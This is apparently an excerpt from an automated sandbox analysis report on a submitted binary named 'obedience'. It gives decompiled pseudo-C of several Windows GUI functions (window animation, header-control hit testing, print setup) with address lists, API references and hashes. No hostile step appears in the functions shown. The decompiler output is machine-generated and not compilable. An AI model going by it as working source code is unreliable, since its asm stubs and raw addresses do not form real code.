				_t349 = _t348 + 0xffffffd8;
				_v12 = __ecx;
				_v8 = __edx;
				_t256 = __eax;
				_v13 = 1;
				_t338 =  *((intOrPtr*)(__eax));
				if((_t338 & 0x00000fff) >= 0x10f) {
					_t136 =  *_v8;
					if(_t136 != 0) {
						if(_t136 != 1) {
							if(E00415A04(_t338,  &_v24) != 0) {
								_push( &_v18);
								if( *((intOrPtr*)( *_v24 + 8))() == 0) {
									_t341 =  *_v8;
									if(( *_v8 & 0x00000fff) >= 0x10f) {
										_t98 =  &_v28; // 0x414a4b
										if(E00415A04(_t341, _t98) != 0) {
											_push( &_v16);
											_t101 =  &_v28; // 0x414a4b
											if( *((intOrPtr*)( *((intOrPtr*)( *_t101)) + 4))() == 0) {
												E0040FD48(0xb);
												goto L46;
											} else {
												if( *_t256 == _v16) {
													_t123 =  &_v28; // 0x414a4b
													_v13 =  *((intOrPtr*)(0x48e364 + _v12 * 2 + ( *((intOrPtr*)( *((intOrPtr*)( *_t123)) + 0x34))(_v12) & 0x0000007f) - 0x1c));
													goto L46;
												} else {
													_push( &_v44);
													L0040EE10();
													_push(_t346);
													_push(0x4151fd);
													_push( *[fs:eax]);
													 *[fs:eax] = _t349;
													_t268 = _v16 & 0x0000ffff;
													E00410AEC( &_v44, _v16 & 0x0000ffff, _t256, __edi, __fp0);
													if(_v44 != _v16) {
														E0040FC58(_t268);
													}
													_t112 =  &_v28; // 0x414a4b
													_v13 =  *((intOrPtr*)(0x48e364 + _v12 * 2 + ( *((intOrPtr*)( *((intOrPtr*)( *_t112)) + 0x34))(_v12) & 0x0000007f) - 0x1c));
													_pop(_t307);
													 *[fs:eax] = _t307;
													_push(0x415230);
													return E004104E4( &_v44);
												}
											}
										} else {
											E0040FD48(0xb);
											goto L46;
										}
									} else {
										_push( &_v44);
										L0040EE10();
										_push(_t346);
										_push(0x415147);
										_push( *[fs:eax]);
										 *[fs:eax] = _t349;
										_t273 =  *_v8 & 0x0000ffff;
										E00410AEC( &_v44,  *_v8 & 0x0000ffff, _t256, __edi, __fp0);
										if( *_v8 != _v44) {
											E0040FC58(_t273);
										}
										_v13 = E00414C90( &_v44, _v12, _v8, _t353);
										_pop(_t310);
										 *[fs:eax] = _t310;
										_push(0x415230);
										return E004104E4( &_v44);
									}
								} else {
									if( *_v8 == _v18) {
										_v13 =  *((intOrPtr*)(0x48e364 + _v12 * 2 + ( *((intOrPtr*)( *_v24 + 0x34))(_v12) & 0x0000007f) - 0x1c));
										goto L46;
									} else {
										_push( &_v44);
										L0040EE10();
										_push(_t346);
										_push(0x4150a5);
										_push( *[fs:eax]);
										 *[fs:eax] = _t349;
										_t278 = _v18 & 0x0000ffff;
										E00410AEC( &_v44, _v18 & 0x0000ffff, _v8, __edi, __fp0);
										if(_v44 != _v18) {
											E0040FC58(_t278);
										}
										_v13 =  *((intOrPtr*)(0x48e364 + _v12 * 2 + ( *((intOrPtr*)( *_v24 + 0x34))(_v12) & 0x0000007f) - 0x1c));
										_pop(_t318);
										 *[fs:eax] = _t318;
										_push(0x415230);
										return E004104E4( &_v44);
									}
								}
							} else {
								E0040FD48(__ecx);
								goto L46;
							}
						} else {
							_v13 = E00414A70(_v12, 2);
							goto L46;
						}
					} else {
						_v13 = E00414A5C(0, 1);
						goto L46;
					}
				} else {
					if(_t338 != 0) {
						if(_t338 != 1) {
							_t7 =  &_v28; // 0x414a4b
							if(E00415A04( *_v8, _t7) != 0) {
								_push( &_v16);
								_t10 =  &_v28; // 0x414a4b
								if( *((intOrPtr*)( *((intOrPtr*)( *_t10)) + 4))() == 0) {
									_push( &_v44);
									L0040EE10();
									_push(_t346);
									_push(0x414fb5);
									_push( *[fs:eax]);
									 *[fs:eax] = _t349;
									_t284 =  *_t256 & 0x0000ffff;
									E00410AEC( &_v44,  *_t256 & 0x0000ffff, _v8, __edi, __fp0);
									if((_v44 & 0x00000fff) !=  *_t256) {
										E0040FC58(_t284);
									}
									_v13 = E00414C90(_t256, _v12,  &_v44, _t353);
									_pop(_t325);
									 *[fs:eax] = _t325;
									_push(0x415230);
									return E004104E4( &_v44);
								} else {
									if( *_t256 == _v16) {
										_t32 =  &_v28; // 0x414a4b
										_v13 =  *((intOrPtr*)(0x48e364 + _v12 * 2 + ( *((intOrPtr*)( *((intOrPtr*)( *_t32)) + 0x34))(_v12) & 0x0000007f) - 0x1c));
										goto L46;
									} else {
										_push( &_v44);
										L0040EE10();
										_push(_t346);
										_push(0x414f27);
										_push( *[fs:eax]);
										 *[fs:eax] = _t349;
										_t289 = _v16 & 0x0000ffff;
										E00410AEC( &_v44, _v16 & 0x0000ffff, _t256, __edi, __fp0);
										if((_v44 & 0x00000fff) != _v16) {
											E0040FC58(_t289);
										}
										_t21 =  &_v28; // 0x414a4b
										_v13 =  *((intOrPtr*)(0x48e364 + _v12 * 2 + ( *((intOrPtr*)( *((intOrPtr*)( *_t21)) + 0x34))(_v12) & 0x0000007f) - 0x1c));
										_pop(_t333);
										 *[fs:eax] = _t333;
										_push(0x415230);
										return E004104E4( &_v44);
									}
								}
							} else {
								E0040FD48(__ecx);
								goto L46;
							}
						} else {
							_v13 = E00414A70(_v12, 0);
							goto L46;
						}
					} else {
						_v13 = E00414A5C(1, 0);
						L46:
						return _v13;
					}
				}
			}























      0x00414e1c
      0x00414e1d
      0x00414e1f
      0x00414e24
      0x00414e27
      0x00414e2a
      0x00414e2c
      0x00414e30
      0x00414e3d
      0x00414fbf
      0x00414fc5
      0x00414fdf
      0x00415001
      0x00415010
      0x00415023
      0x004150d9
      0x004150e6
      0x0041514e
      0x0041515d
      0x0041516c
      0x00415174
      0x0041517e
      0x0041522b
      0x00000000
      0x00415184
      0x0041518b
      0x0041520d
      0x00415226
      0x00000000
      0x0041518d
      0x00415190
      0x00415191
      0x00415198
      0x00415199
      0x0041519e
      0x004151a1
      0x004151a4
      0x004151ad
      0x004151ba
      0x004151bc
      0x004151bc
      0x004151cb
      0x004151e4
      0x004151e9
      0x004151ec
      0x004151ef
      0x004151fc
      0x004151fc
      0x0041518b
      0x0041515f
      0x0041515f
      0x00000000
      0x0041515f
      0x004150e8
      0x004150eb
      0x004150ec
      0x004150f3
      0x004150f4
      0x004150f9
      0x004150fc
      0x00415102
      0x0041510a
      0x00415119
      0x0041511b
      0x0041511b
      0x0041512e
      0x00415133
      0x00415136
      0x00415139
      0x00415146
      0x00415146
      0x00415029
      0x00415033
      0x004150ce
      0x00000000
      0x00415035
      0x00415038
      0x00415039
      0x00415040
      0x00415041
      0x00415046
      0x00415049
      0x0041504c
      0x00415056
      0x00415063
      0x00415065
      0x00415065
      0x0041508c
      0x00415091
      0x00415094
      0x00415097
      0x004150a4
      0x004150a4
      0x00415033
      0x00415003
      0x00415003
      0x00000000
      0x00415003
      0x00414fe1
      0x00414fed
      0x00000000
      0x00414fed
      0x00414fc7
      0x00414fd0
      0x00000000
      0x00414fd0
      0x00414e43
      0x00414e46
      0x00414e5d
      0x00414e73
      0x00414e83
      0x00414e92
      0x00414e9a
      0x00414ea4
      0x00414f5b
      0x00414f5c
      0x00414f63
      0x00414f64
      0x00414f69
      0x00414f6c
      0x00414f6f
      0x00414f78
      0x00414f88
      0x00414f8a
      0x00414f8a
      0x00414f9c
      0x00414fa1
      0x00414fa4
      0x00414fa7
      0x00414fb4
      0x00414eaa
      0x00414eb1
      0x00414f37
      0x00414f50
      0x00000000
      0x00414eb3
      0x00414eb6
      0x00414eb7
      0x00414ebe
      0x00414ebf
      0x00414ec4
      0x00414ec7
      0x00414eca
      0x00414ed3
      0x00414ee4
      0x00414ee6
      0x00414ee6
      0x00414ef5
      0x00414f0e
      0x00414f13
      0x00414f16
      0x00414f19
      0x00414f26
      0x00414f26
      0x00414eb1
      0x00414e85
      0x00414e85
      0x00000000
      0x00414e85
      0x00414e5f
      0x00414e6b
      0x00000000
      0x00414e6b
      0x00414e48
      0x00414e51
      0x00415230
      0x00415238
      0x00415238
      0x00414e46

      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID:
      • String ID: KJA
      • API String ID: 0-2294508986
      • Opcode ID: 85e3309fb15b4a9f1f27f14b91de77616cce60323e4ff3a91297070ddf108b2d
      • Instruction ID: ec51f36f6ba780754a7a8d35addf012dfccb9b9b5852bcd2f8c3e16a96cd157d
      • Opcode Fuzzy Hash: 85e3309fb15b4a9f1f27f14b91de77616cce60323e4ff3a91297070ddf108b2d
      • Instruction Fuzzy Hash: 2BD19439A00249DFCB10EF95C4819EEBBB5EF89310F5444A6E840A7351D738AEC6DB79
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00476988 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 163windowCOMMON
      Download Yara Rule
      C-Code - Quality: 86%
      			E00476988(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v28;
				void* _v32;
				struct tagPOINT _v40;
				void* _t55;
				void* _t56;
				signed char _t60;
				struct HWND__* _t61;
				void* _t64;
				void* _t66;
				struct HWND__* _t73;
				signed short _t80;
				void* _t89;
				int _t93;
				long _t106;
				intOrPtr* _t112;
				intOrPtr _t123;
				intOrPtr _t124;
				void* _t132;
				signed char* _t141;
				void* _t144;
				void* _t145;
				struct HWND__* _t148;
				void* _t152;

				_v16 = 0;
				_t144 = __edx;
				_t112 = __eax;
				_push(_t152);
				_push(0x476b87);
				_push( *[fs:eax]);
				 *[fs:eax] = _t152 + 0xffffffdc;
				E00449440(__eax, 0, __edx, __eflags);
				if(E00476BB8(_t112) == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t144 + 8)))) !=  *((intOrPtr*)(_t112 + 0x264))) {
					L22:
					_pop(_t123);
					 *[fs:eax] = _t123;
					_push(0x476b8e);
					return E00404A40( &_v16);
				} else {
					_t124 =  *((intOrPtr*)(_t144 + 8));
					_t55 =  *((intOrPtr*)(_t124 + 8)) - 0xfffffec9;
					if(_t55 == 0) {
						 *((char*)(_t112 + 0x295)) = 1;
						goto L22;
					}
					_t56 = _t55 - 4;
					if(_t56 == 0) {
						_t57 = _t124;
						_t141 =  *(_t124 + 0x14);
						__eflags =  *_t141 & 0x00000001;
						if(( *_t141 & 0x00000001) != 0) {
							_t145 = E0047950C(_t112,  *((intOrPtr*)(_t57 + 0xc)));
							_t60 =  *(_t145 + 0x18);
							__eflags = _t60 - _t141[4];
							if(_t60 < _t141[4]) {
								_t61 =  *(_t145 + 0x14);
								__eflags = _t61;
								if(_t61 > 0) {
									__eflags = _t61 - _t141[4];
									if(_t61 <= _t141[4]) {
										_t141[4] = _t61;
									}
								}
							} else {
								_t141[4] = _t60;
							}
							E00473FE4(_t145, _t141[4]);
						}
					} else {
						_t64 = _t56 - 2;
						if(_t64 == 0) {
							_t66 = E0047950C(_t112,  *((intOrPtr*)(_t124 + 0xc)));
							E00473FE4(_t66, E0042D290(E0044B158(_t112),  *((intOrPtr*)(_t124 + 0xc))));
							_t73 =  *((intOrPtr*)( *_t112 + 0x124))();
							__eflags = _t73;
							if(_t73 != 0) {
								 *((intOrPtr*)( *_t112 + 0x7c))();
							}
						} else {
							if(_t64 == 0x12c) {
								_push(E00407A1C(GetMessagePos()) & 0x0000ffff);
								_t80 = GetMessagePos();
								_pop(_t132);
								E00406DA4(_t80 & 0x0000ffff,  &_v12, _t132);
								E0044446C(_t112,  &_v40,  &_v12);
								_push(_v40.y);
								_t148 = ChildWindowFromPoint(E0044B158(_t112), _v40.x);
								__eflags = _t148;
								if(_t148 != 0) {
									_t89 = E0044B158(_t112);
									__eflags = _t148 - _t89;
									if(_t148 != _t89) {
										E0040508C( &_v16, 0x50);
										_t93 = E00404D00(_v16);
										E0040508C( &_v16, GetClassNameA(_t148, E00404F00(_v16), _t93));
										E00404E4C(_v16, "SysHeader32");
										if(__eflags == 0) {
											E0044446C(_t112,  &_v40,  &_v12);
											_v32 = _v40;
											_v28 = _v40.y;
											_t106 = SendMessageA(_t148, 0x1206, 1,  &_v32);
											__eflags = _t106;
											if(_t106 >= 0) {
												E0047950C(_t112, _v20);
												E00403DF8(_t112, __eflags);
											}
										}
									}
								}
							}
						}
					}
					goto L22;
				}
			}





























      0x00476993
      0x00476996
      0x00476998
      0x0047699c
      0x0047699d
      0x004769a2
      0x004769a5
      0x004769ac
      0x004769ba
      0x00476b71
      0x00476b73
      0x00476b76
      0x00476b79
      0x00476b86
      0x004769d1
      0x004769d1
      0x004769d9
      0x004769de
      0x00476a3f
      0x00000000
      0x00476a3f
      0x004769e0
      0x004769e3
      0x004769fa
      0x004769fc
      0x004769ff
      0x00476a02
      0x00476a12
      0x00476a14
      0x00476a17
      0x00476a1a
      0x00476a21
      0x00476a24
      0x00476a26
      0x00476a28
      0x00476a2b
      0x00476a2d
      0x00476a2d
      0x00476a2b
      0x00476a1c
      0x00476a1c
      0x00476a1c
      0x00476a35
      0x00476a35
      0x004769e5
      0x004769e5
      0x004769e8
      0x00476a52
      0x00476a6c
      0x00476a79
      0x00476a7f
      0x00476a81
      0x00476a8b
      0x00476a8b
      0x004769ea
      0x004769ef
      0x00476aa0
      0x00476aa1
      0x00476aac
      0x00476aad
      0x00476aba
      0x00476abf
      0x00476ad2
      0x00476ad4
      0x00476ad6
      0x00476ade
      0x00476ae3
      0x00476ae5
      0x00476af3
      0x00476afb
      0x00476b15
      0x00476b22
      0x00476b27
      0x00476b31
      0x00476b39
      0x00476b3f
      0x00476b4e
      0x00476b53
      0x00476b55
      0x00476b5c
      0x00476b6c
      0x00476b6c
      0x00476b55
      0x00476b27
      0x00476ae5
      0x00476ad6
      0x004769ef
      0x004769e8
      0x00000000
      0x004769e3

      APIs
      • GetMessagePos.USER32 ref: 00476A93
      • GetMessagePos.USER32 ref: 00476AA1
      • ChildWindowFromPoint.USER32 ref: 00476ACD
      • GetClassNameA.USER32(00000000,00000000,00000000), ref: 00476B0B
      • SendMessageA.USER32 ref: 00476B4E
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Message$ChildClassFromNamePointSendWindow
      • String ID: SysHeader32
      • API String ID: 2510305242-2725536604
      • Opcode ID: cf21ce0e7569bf682f7d3d3bcad9d5888024a682015ca43439950e6ed2defd22
      • Instruction ID: 47be30efa61cfac26e4ce42d5826feb7008f8c8c0e167b874e09279044384e2b
      • Opcode Fuzzy Hash: cf21ce0e7569bf682f7d3d3bcad9d5888024a682015ca43439950e6ed2defd22
      • Instruction Fuzzy Hash: 74519130B009155BC711EF7AC8829EEB3B6AF85344B15C57BE809E7352DB3CED058A98
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0047377C Relevance: 10.7, APIs: 7, Instructions: 163windowCOMMON
      Download Yara Rule
      C-Code - Quality: 58%
      			E0047377C(intOrPtr __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				void* _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				void* _v60;
				void* _v76;
				signed int _t73;
				signed int _t75;
				signed int _t89;
				signed int _t115;
				signed int _t119;
				void* _t123;
				intOrPtr _t124;
				signed int _t125;
				long _t126;
				intOrPtr _t137;
				signed int _t141;
				void* _t144;
				void* _t147;
				void* _t149;
				void* _t151;
				void* _t154;
				void* _t155;
				intOrPtr _t156;
				void* _t157;

				_t157 = __eflags;
				_t154 = _t155;
				_t156 = _t155 + 0xffffffb8;
				_push(__edi);
				_t123 = __edx;
				_v8 = __eax;
				E00403498( &_v60, 0x30);
				_t147 = E0042FC9C();
				_t3 = _t147 + 0x18; // 0x18
				E00404A94(_t3, _t123);
				E0042F404(_t147, 0, __edi, _t147, _t154, _t157);
				_t124 = E0042F7A0(_t147);
				_v60 = _t124;
				_v56 = _t124;
				_push(0x58);
				_t73 = E0042F7A0(_t147);
				_push(_t73);
				L00407348();
				_t125 = _t73;
				_push(0x5a);
				_t75 = E0042F7A0(_t147);
				_push(_t75);
				L00407348();
				_t141 = _t75;
				if(E00406E0C(_v8 + 0x278) == 0) {
					asm("cdq");
					_v52 =  *(_v8 + 0x278) * 0x5a0 / _t125;
					asm("cdq");
					_v48 =  *(_v8 + 0x27c) * 0x5a0 / _t141;
					asm("cdq");
					_v44 =  *(_v8 + 0x280) * 0x5a0 / _t125;
					_t89 =  *(_v8 + 0x284) * 0x5a0;
					asm("cdq");
					__eflags = _t89 % _t141;
					_v40 = _t89 / _t141;
				} else {
					_t115 = E0042F7D0(_t147);
					asm("cdq");
					_v44 = _t115 * 0x5a0 / _t125;
					_t119 = E0042F7B4(_t147);
					asm("cdq");
					_v40 = _t119 * 0x5a0 / _t141;
				}
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t149 = _t147;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t151 = _t149;
				_t126 = 0;
				_t144 = E0044489C();
				_v16 = 0xffffffff;
				_v12 = SetMapMode(_v60, 1);
				SendMessageA(E0044B158(_v8), 0x439, 0, 0);
				_push(_t154);
				_push(0x473943);
				_push( *[fs:eax]);
				 *[fs:eax] = _t156;
				while(1) {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t144 = _t144;
					_t151 = _t151;
					_v20 = _t126;
					_t126 = SendMessageA(E0044B158(_v8), 0x439, 1,  &_v60);
					if(_t144 > _t126) {
						_t161 = _t126 - 0xffffffff;
						if(_t126 != 0xffffffff) {
							E0042F4C0(_t151, _t161);
						}
					}
					if(_t144 <= _t126) {
						break;
					}
					_t163 = _t126 - 0xffffffff;
					if(_t126 != 0xffffffff) {
						continue;
					}
					break;
				}
				E0042F48C(_t151, _t163);
				_pop(_t137);
				 *[fs:eax] = _t137;
				_push(0x47394a);
				SendMessageA(E0044B158(_v8), 0x439, 0, 0);
				return SetMapMode(_v60, _v12);
			}


































      0x0047377c
      0x0047377d
      0x0047377f
      0x00473784
      0x00473785
      0x00473787
      0x00473794
      0x0047379e
      0x004737a0
      0x004737a5
      0x004737ac
      0x004737b8
      0x004737ba
      0x004737bd
      0x004737c0
      0x004737c4
      0x004737c9
      0x004737ca
      0x004737cf
      0x004737d1
      0x004737d5
      0x004737da
      0x004737db
      0x004737e0
      0x004737f1
      0x00473828
      0x0047382b
      0x0047383b
      0x0047383e
      0x0047384e
      0x00473851
      0x00473857
      0x00473861
      0x00473862
      0x00473864
      0x004737f3
      0x004737f5
      0x00473800
      0x00473803
      0x00473808
      0x00473813
      0x00473816
      0x00473816
      0x0047386e
      0x0047386f
      0x00473870
      0x00473871
      0x00473872
      0x0047387a
      0x0047387b
      0x0047387c
      0x0047387d
      0x0047387e
      0x0047387f
      0x00473889
      0x0047388b
      0x0047389d
      0x004738b2
      0x004738b9
      0x004738ba
      0x004738bf
      0x004738c2
      0x004738c5
      0x004738cd
      0x004738ce
      0x004738cf
      0x004738d0
      0x004738d1
      0x004738d2
      0x004738d3
      0x004738ef
      0x004738f3
      0x004738f5
      0x004738f8
      0x004738fc
      0x004738fc
      0x004738f8
      0x00473903
      0x00000000
      0x00000000
      0x00473905
      0x00473908
      0x00000000
      0x00000000
      0x00000000
      0x00473908
      0x0047390c
      0x00473913
      0x00473916
      0x00473919
      0x00473930
      0x00473942

      APIs
        • Part of subcall function 0042F404: SetAbortProc.GDI32(?,Function_0002EE70), ref: 0042F46D
        • Part of subcall function 0042F404: StartDocA.GDI32(?), ref: 0042F477
        • Part of subcall function 0042F404: StartPage.GDI32(?), ref: 0042F480
      • 73BEAD70.GDI32(00000000,00000058), ref: 004737CA
      • 73BEAD70.GDI32(00000000,0000005A,00000000,00000058), ref: 004737DB
      • SetMapMode.GDI32(?,00000001), ref: 00473898
      • SendMessageA.USER32 ref: 004738B2
      • SendMessageA.USER32 ref: 004738EA
        • Part of subcall function 0042F7D0: 73BEAD70.GDI32(?,00000008,00000000,004737FA,00000000,0000005A,00000000,00000058), ref: 0042F7E2
        • Part of subcall function 0042F7B4: 73BEAD70.GDI32(?,0000000A,00000000,0047380D,00000000,0000005A,00000000,00000058), ref: 0042F7C6
      • SendMessageA.USER32 ref: 00473930
      • SetMapMode.GDI32(?,?), ref: 0047393D
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: MessageSend$ModeStart$AbortPageProc
      • String ID:
      • API String ID: 1188224737-0
      • Opcode ID: 9f3041c70fba00ea1216353b92736ad3caf1914057131e12a6dc37c3536e7c8f
      • Instruction ID: 65423c92b975faf8eb5231db35d91a7dc78b31b34161e393dce898ecf0d2ecf0
      • Opcode Fuzzy Hash: 9f3041c70fba00ea1216353b92736ad3caf1914057131e12a6dc37c3536e7c8f
      • Instruction Fuzzy Hash: 8C51D8B1B00614AADB00EFAADC86ACEB7F4EF45714F90053AF504FB2C1D6799E058B59
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0044C7D0 Relevance: 10.7, APIs: 7, Instructions: 156COMMON
      Download Yara Rule
      C-Code - Quality: 69%
      			E0044C7D0(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				void _v12;
				intOrPtr _v16;
				int _v24;
				int _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr* _t80;
				intOrPtr _t91;
				void* _t119;
				intOrPtr _t136;
				intOrPtr _t145;
				void* _t148;

				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t119 = __ecx;
				_v8 = __eax;
				_t145 =  *0x48f9b8; // 0x490b80
				 *((char*)(_v8 + 0x210)) = 1;
				_push(_t148);
				_push(0x44c9a9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t148 + 0xffffffe0;
				E00444958(_v8, __ecx, __ecx, _t145);
				_v16 = _v16 + 4;
				E00445B8C(_v8,  &_v28);
				if(E00461FF8() <  *(_v8 + 0x4c) + _v24) {
					_v24 = E00461FF8() -  *(_v8 + 0x4c);
				}
				if(E00462004() <  *(_v8 + 0x48) + _v28) {
					_v28 = E00462004() -  *(_v8 + 0x48);
				}
				if(E00461FEC() > _v28) {
					_v28 = E00461FEC();
				}
				if(E00461FE0() > _v16) {
					_v16 = E00461FE0();
				}
				SetWindowPos(E0044B158(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10);
				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x214)) > 0xfa && E00404D00(_t119) < 0x64 &&  *0x48ebd4 != 0) {
					SystemParametersInfoA(0x1016, 0,  &_v12, 0);
					if(_v12 != 0) {
						SystemParametersInfoA(0x1018, 0,  &_v12, 0);
						if(_v12 == 0) {
							E0044FAB8( &_v36);
							if(_v32 <= _v24) {
							}
						}
						 *0x48ebd4(E0044B158(_v8), 0x64,  *0x0048ECDC | 0x00040000);
					}
				}
				_t80 =  *0x48f840; // 0x490b7c
				_t45 =  *_t80 + 0x30; // 0xe036e
				E00448864(_v8,  *_t45);
				ShowWindow(E0044B158(_v8), 4);
				 *((intOrPtr*)( *_v8 + 0x7c))();
				_pop(_t136);
				 *[fs:eax] = _t136;
				_push(0x44c9b0);
				 *((intOrPtr*)(_v8 + 0x214)) = GetTickCount();
				_t91 = _v8;
				 *((char*)(_t91 + 0x210)) = 0;
				return _t91;
			}
















      0x0044c7de
      0x0044c7df
      0x0044c7e0
      0x0044c7e1
      0x0044c7e2
      0x0044c7e4
      0x0044c7e7
      0x0044c7f0
      0x0044c7f9
      0x0044c7fa
      0x0044c7ff
      0x0044c802
      0x0044c80a
      0x0044c80f
      0x0044c819
      0x0044c830
      0x0044c83f
      0x0044c83f
      0x0044c854
      0x0044c863
      0x0044c863
      0x0044c870
      0x0044c879
      0x0044c879
      0x0044c886
      0x0044c88f
      0x0044c88f
      0x0044c8b5
      0x0044c8cd
      0x0044c8f5
      0x0044c8fe
      0x0044c90d
      0x0044c916
      0x0044c924
      0x0044c92f
      0x0044c92f
      0x0044c92f
      0x0044c953
      0x0044c953
      0x0044c8fe
      0x0044c959
      0x0044c960
      0x0044c966
      0x0044c976
      0x0044c980
      0x0044c985
      0x0044c988
      0x0044c98b
      0x0044c998
      0x0044c99e
      0x0044c9a1
      0x0044c9a8

      APIs
      • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,0044C9A9), ref: 0044C8B5
      • GetTickCount.KERNEL32 ref: 0044C8BA
      • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 0044C8F5
      • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 0044C90D
      • AnimateWindow.USER32(00000000,00000064,00000001), ref: 0044C953
      • ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,0044C9A9), ref: 0044C976
        • Part of subcall function 0044FAB8: GetCursorPos.USER32(?,?,0044C929,00001018,00000000,00000000,00000000,00001016,00000000,?,00000000,00000000,000000FF,?,?,?), ref: 0044FABC
      • GetTickCount.KERNEL32 ref: 0044C990
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
